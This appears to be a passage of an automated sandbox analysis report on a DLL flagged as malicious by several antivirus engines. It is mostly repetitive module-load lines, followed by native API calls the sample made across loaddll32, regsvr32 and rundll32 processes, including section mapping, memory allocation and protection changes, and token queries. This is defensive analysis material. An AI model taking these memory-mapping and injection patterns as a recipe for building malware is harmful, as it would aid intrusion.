            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F21D40_2_005F21D4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7B0DC0_2_00C7B0DC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C759200_2_00C75920
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_004021D42_2_004021D4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005121D43_2_005121D4
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408B0DC3_2_0408B0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_040859203_2_04085920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BB0DC6_2_047BB0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047B59206_2_047B5920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFB0DC9_2_04BFB0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BF59209_2_04BF5920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0B0DC12_2_04C0B0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0592012_2_04C05920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0435B0DC16_2_0435B0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0435592016_2_04355920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0677B0DC18_2_0677B0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0677592018_2_06775920
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FDB0DC21_2_04FDB0DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FD592021_2_04FD5920
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F10BA NtMapViewOfSection,0_2_005F10BA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F1A34 GetProcAddress,NtCreateSection,memset,0_2_005F1A34
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005F23F5 NtQueryVirtualMemory,0_2_005F23F5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C771B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00C771B9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C7B2FD NtQueryVirtualMemory,0_2_00C7B2FD
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2009C NtAllocateVirtualMemory,0_2_00C2009C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C2029D NtProtectVirtualMemory,0_2_00C2029D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C20066 NtAllocateVirtualMemory,0_2_00C20066
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_00401A34 GetProcAddress,NtCreateSection,memset,2_2_00401A34
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_004010BA NtMapViewOfSection,2_2_004010BA
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_004023F5 NtQueryVirtualMemory,2_2_004023F5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00511A34 GetProcAddress,NtCreateSection,memset,3_2_00511A34
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005110BA NtMapViewOfSection,3_2_005110BA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005123F5 NtQueryVirtualMemory,3_2_005123F5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_040871B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_040871B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0408B2FD NtQueryVirtualMemory,3_2_0408B2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D0066 NtAllocateVirtualMemory,3_2_005D0066
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D029D NtProtectVirtualMemory,3_2_005D029D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_005D009C NtAllocateVirtualMemory,3_2_005D009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047B71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_047B71B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_047BB2FD NtQueryVirtualMemory,6_2_047BB2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BF71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,9_2_04BF71B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04BFB2FD NtQueryVirtualMemory,9_2_04BFB2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C071B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,12_2_04C071B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04C0B2FD NtQueryVirtualMemory,12_2_04C0B2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_043571B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,16_2_043571B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0435B2FD NtQueryVirtualMemory,16_2_0435B2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0098009C NtAllocateVirtualMemory,16_2_0098009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0098029D NtProtectVirtualMemory,16_2_0098029D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00980066 NtAllocateVirtualMemory,16_2_00980066
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_067771B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,18_2_067771B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_0677B2FD NtQueryVirtualMemory,18_2_0677B2FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A0066 NtAllocateVirtualMemory,18_2_045A0066
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A009C NtAllocateVirtualMemory,18_2_045A009C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_045A029D NtProtectVirtualMemory,18_2_045A029D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FD71B9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,21_2_04FD71B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04FDB2FD NtQueryVirtualMemory,21_2_04FDB2FD
            Source: MGrYFpGLQ7.dllVirustotal: Detection: 82%
            Source: MGrYFpGLQ7.dllMetadefender: Detection: 59%
            Source: MGrYFpGLQ7.dllReversingLabs: Detection: 88%
            Source: MGrYFpGLQ7.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
